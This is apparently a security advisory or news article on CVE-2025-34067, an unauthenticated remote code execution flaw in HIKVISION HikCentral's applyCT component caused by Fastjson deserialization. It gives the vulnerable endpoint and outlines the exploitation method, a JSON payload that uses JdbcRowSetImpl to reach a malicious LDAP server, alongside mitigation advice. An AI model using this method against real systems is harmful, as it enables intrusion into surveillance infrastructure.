A significant security flaw has been identified in HIKVISION’s applyCT component, integral to the HikCentral Integrated Security Management Platform. This vulnerability, designated as CVE-2025-34067 with a maximum CVSS score of 10.0, enables unauthenticated attackers to execute arbitrary code remotely. The root cause lies in the platform’s utilization of a susceptible version of the Fastjson library, potentially compromising millions of surveillance devices globally.
Key Highlights:
1. Vulnerability Details: CVE-2025-34067 (CVSS 10.0) in HIKVISION’s applyCT component permits unauthenticated remote code execution.
2. Exploitation Method: Attackers exploit the Fastjson library by sending malicious JSON payloads to the /bic/ssoService/v1/applyCT endpoint, leveraging LDAP connections.
3. Affected Systems: The vulnerability impacts HikCentral surveillance platforms deployed across governmental, commercial, and industrial sectors worldwide.
4. Recommended Actions: Organizations should promptly evaluate their deployments, restrict network access, and contact HIKVISION for patches, as the vulnerability is actively being exploited.
In-Depth Analysis of the Fastjson Deserialization Vulnerability:
The vulnerability is exploited through the /bic/ssoService/v1/applyCT endpoint by sending specially crafted JSON payloads processed by the Fastjson library. Attackers can design specific JSON requests that activate Fastjson’s auto-type feature, allowing the loading of arbitrary Java classes. This technique involves manipulating the JdbcRowSetImpl class to establish connections with untrusted LDAP servers, effectively circumventing security controls.
To execute the exploit, an attacker sends a POST request with the Content-Type set to application/json to the vulnerable endpoint. By altering the datasource parameter to reference a malicious LDAP server, the attacker can achieve remote code execution on the target system. This scenario exemplifies CWE-502 (Deserialization of Untrusted Data) combined with CWE-917 (Expression Language Injection), where inadequate input validation permits unauthorized class loading and code execution.
Impacted Systems and Potential Consequences:
The vulnerability affects the HikCentral platform, previously known as the Integrated Security Management Platform, which serves as a comprehensive security management solution extensively deployed across various sectors. The platform’s widespread adoption is particularly concerning, as it provides centralized control over multiple security devices and surveillance systems.
Potential repercussions include unauthorized access to sensitive surveillance data, manipulation of security systems, and the possibility of lateral movement within network infrastructures. Organizations utilizing affected HIKVISION applyCT systems face risks of data breaches, service disruptions, and potential compromise of their entire security infrastructure.
The unauthenticated nature of this vulnerability means attackers can exploit it without requiring valid credentials, significantly lowering the barrier to entry for malicious actors. This has led to its classification as a known-exploited vulnerability, indicating active exploitation in the wild.
Risk Factors:
– Affected Products: HIKVISION HikCentral (formerly Integrated Security Management Platform) – applyCT component – Versions using the vulnerable Fastjson library.
– Impact: Remote Code Execution (RCE).
– Exploit Prerequisites: Network access to the /bic/ssoService/v1/applyCT endpoint, ability to send HTTP POST requests, no authentication required, and access to a malicious LDAP server.
– CVSS Score: 10.0 (Critical).
Mitigation Strategies:
Organizations should immediately assess their HIKVISION applyCT deployments and implement network segmentation to limit exposure. Monitoring for unusual network traffic to the /bic/ssoService/v1/applyCT endpoint can help detect exploitation attempts. While specific patches have not been detailed in current advisories, users should contact HIKVISION support for immediate remediation guidance and consider temporarily restricting access to the vulnerable endpoint until patches are available.
Security teams should also implement additional monitoring for LDAP connection attempts from their HIKVISION systems and consider deploying network-based intrusion detection systems to identify potential exploitation attempts targeting this critical vulnerability.
